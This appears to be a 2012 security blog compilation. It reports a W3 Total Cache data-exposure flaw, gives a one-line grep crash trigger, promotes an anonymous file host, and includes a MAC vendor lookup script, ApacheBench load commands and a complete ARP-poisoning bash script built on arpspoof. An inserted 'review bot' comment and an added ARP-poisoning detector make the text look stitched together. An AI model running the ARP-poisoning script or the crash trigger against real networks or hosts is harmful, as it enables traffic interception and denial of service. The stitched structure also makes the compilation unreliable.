Dec 27, 2012

News: W3 Total Cache vulnerability allows hacker to steal password and db info

Jason A. Donenfeld has discovered a critical vulnerability in one of the famous WordPress plugins, "W3 Total Cache". The plugin helps to improve the user experience of your site by improving your server performance, caching every aspect of your site.

The cache data is stored in a publicly accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

  

Source: http://www.ehackingnews.com/2012/12/w3-total-cache-vulnerability-allows.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

0day grep DoS

If you want the full details of this vulnerability, please go to the Source.

$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
 
This checkin adds this text to the NEWS file:

+ grep no longer dumps core on lines whose lengths do not fit in 'int'.
+ (e.g., lines longer than 2 GiB on a typical 64-bit host).
+ Instead, grep either works as expected, or reports an error.
+ An error can occur if not enough main memory is available, or if the
+ GNU C library's regular expression functions cannot handle such long lines.
+ [bug present since "the beginning"] 
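
Review bot: the line "Instead, grep either works as expected, or reports an error." does not say what that error looks like, so a caller piping untrusted input into grep cannot tell from this entry how to distinguish the failure from "no match". Suggest naming the diagnostic or the exit status in the entry. The trigger is also given only by example ("lines longer than 2 GiB on a typical 64-bit host"); stating the limit in terms of 'int' for other hosts as well would make the affected range explicit.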

Source: http://www.openwall.com/lists/oss-security/2012/12/22/1



Anonymously uploading or hosting files with Anonfiles.com

If you want to upload or host a file anonymously, try anonfiles.com :)

Upload your files anonymously and for free on AnonFiles.com. The maximum file size is 500 MB. :)


Source: https://anonfiles.com/ 


Dec 25, 2012

Howto: Perl Script for MAC Address Lookup

Sometimes you want to look up which vendor a MAC address belongs to, and there are many online tools for that. But if you want to work offline in Backtrack 4, you can use this script instead. This script was developed by Hawkje.

#!/usr/bin/perl
# MAC address OUI checker
# Thijs (Thice) Bosschert
# http://www.thice.nl
# v0.1 24-06-2010

# Print header
print "\n  MAC address OUI checker v0.1\n".
      "  by Thijs (Thice) Bosschert\n\n";

# Check if argument has been given
if (!$ARGV[0]) {
  &error;
}

# Removing separators from MAC address and uppercase chars
$ARGV[0] =~ s/[:\s-]//g;
$ARGV[0] =~ y/a-z/A-Z/;

# Get OUI from MAC
if ($ARGV[0] =~ /^([0-9a-f]{6})/i) {
  $OUI = $1;
  print "  Checking OUI: ".$OUI."\n";
} else {
  &error;
}

# Open OUI file from aircrack-ng (stop with a clear error if it is missing)
open(FILE, "<", "/usr/local/etc/aircrack-ng/airodump-ng-oui.txt")
  or die "  Error: cannot open OUI file: $!\n";
  while (<FILE>) {
    ($checkoui,$company) = split(/\(hex\)/,$_);
    $checkoui =~ s/[-\s]//g;
    # Check if OUI can be found in the list
    if ($OUI eq $checkoui) {
      $company =~ s/\t//g;
      # Output found OUI
      print "  Found OUI: ".$OUI." - ".$company."\n\n";
      exit;
    }
  }
close(FILE);

# Show if OUI was not found
print "  Could not find OUI: ".$OUI."\n\n";

# Error messages
sub error {
  print "  Error: No MAC address or OUI specified or could not recognize it.\n".
        "    Usage: perl OUI_lookup.pl <MAC/OUI>\n".
        "    MAC can be submitted as:\n".
        "       001122334455\n".
        "       00:11:22:33:44:55\n".
        "       00-11-22-33-44-55\n".
        "    OUI can be submitted as:\n".
        "       001122\n".
        "       00:11:22\n".
        "       00-11-22\n\n";
  exit;
}



Source: http://www.backtrack-linux.org/forums/showthread.php?t=29819

 


Dec 24, 2012

Howto: ARP Poisoning Shell Script By Pentestlab

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n\033[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi



Source: http://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/ 
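
From the defending side, the effect of the script above is visible in the target's ARP cache: the gateway's IP now resolves to a MAC that is not the gateway's. The following check is an added example, not part of the Pentestlab script; the function names, addresses and sample `arp -an` output are constructed for illustration.

```shell
#!/bin/sh
# Added example: look for signs of ARP cache poisoning in `arp -an` output.
# Line format assumed (Linux net-tools):
#   ? (192.168.1.1) at 08:00:27:aa:bb:cc [ether] on eth0

# Constructed sample table: the gateway (.1) and another host (.50)
# resolve to the same MAC, as they would on a poisoned target.
sample_arp_table() {
  cat <<'EOF'
? (192.168.1.1) at 08:00:27:aa:bb:cc [ether] on eth0
? (192.168.1.20) at 52:54:00:12:34:56 [ether] on eth0
? (192.168.1.50) at 08:00:27:AA:BB:CC [ether] on eth0
? (192.168.1.30) at <incomplete> on eth0
EOF
}

# Print every MAC that answers for more than one IP, with those IPs.
duplicate_macs() {
  awk '$3 == "at" && $4 != "<incomplete>" {
         ip = $2; gsub(/[()]/, "", ip); mac = tolower($4)
         if (!((mac, ip) in seen)) {
           seen[mac, ip] = 1
           ips[mac] = (n[mac]++ ? (ips[mac] ",") : "") ip
         }
       }
       END { for (m in n) if (n[m] > 1) print m, ips[m] }' | sort
}

# Compare the cached MAC for the gateway against a pinned, known-good one.
# Returns 0 on match, 1 on mismatch (possible poisoning), 2 if no entry.
check_gateway_mac() {
  gw_ip=$1
  pinned=$(printf '%s' "$2" | tr 'A-F' 'a-f')
  current=$(awk -v ip="($gw_ip)" \
    '$2 == ip && $3 == "at" && $4 != "<incomplete>" { print tolower($4); exit }')
  [ -n "$current" ] || return 2
  [ "$current" = "$pinned" ] && return 0
  echo "ALERT: $gw_ip is at $current, expected $pinned"
  return 1
}

# Demo on the constructed table; on a live host pipe `arp -an` in instead.
sample_arp_table | duplicate_macs
sample_arp_table | check_gateway_mac 192.168.1.1 00:11:22:33:44:55 || true
```

The pinned-MAC check is the more reliable of the two, since the duplicate only appears when the target also holds a cache entry for the poisoning host's own IP.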


Howto: Benchmark your web server with Apache Benchmarks

1. Apache Benchmarks
ab -k -n 50000 -c 200 -g gnuplot-output.txt http://target_ip
-k keep alive [multiple requests within one HTTP session]
-n number of requests
-c number of requests to perform at a time
-g gnuplot-file output

2. Create the PNG file to display the benchmark
$ gnuplot configfile

Example configfile
# output as png image
set terminal png

# save file to "benchmark.png"
set output "benchmark.png"

# graph title
set title "ab -k -n 50000 -c 200"

# nicer aspect ratio for image size
set size 1,0.7

# y-axis grid
set grid y

# x-axis label
set xlabel "request"

# y-axis label
set ylabel "response time (ms)"

# plot data from "server1.txt" and "server2.txt" using column 9 with smooth sbezier lines
plot "server1.txt" using 9 smooth sbezier with lines title "server1:", \
     "server2.txt" using 9 smooth sbezier with lines title "server2:"


Source: http://www.kutukupret.com/2011/05/10/graphing-apachebench-results-using-gnuplot/
